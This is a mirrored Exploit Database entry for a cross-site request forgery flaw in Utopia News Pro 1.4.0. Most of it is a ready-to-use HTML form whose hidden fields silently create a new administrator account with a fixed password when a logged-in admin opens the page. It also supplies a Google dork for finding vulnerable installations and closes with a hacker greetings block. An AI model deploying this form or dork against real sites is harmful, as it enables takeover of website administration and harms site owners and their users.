Utopia News Pro 1.4.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 36 阅读

• 作者： Dr.NaNo
  日期： 2012-04-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18720/

• # Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
  # Date: 7/4/2012
  # Author: Dr.NaNo
  # Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
  # Version: 1.4.0
  # Tested on: Linux-Red-Hat
  # Google Dork: Powered By Utopia News Pro 1.4.0
  #
  ########################################################
  #~ Exploit ~ #
  ########################################################
   
  <html>
  <body>
  <form action="http://localhost/{PATh}/upload/users.php" method="post" />
  <input type="hidden" name="username" value="NANO" />
  <input type="hidden" name="groupid" value="1" />
  <input type="hidden" name="password" value="102030" />
  <input type="hidden" name="password2" value="102030" />
  <input type="hidden" name="email" value="security@security.com" />
  <input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
  </form>
  </body>
  </html>
   
  #### ~ Greetz ~ #########################################################
  # #
  # Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020#
  # #
  # JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng#
  # #
  ############################################### ~ All FriendS ~ #########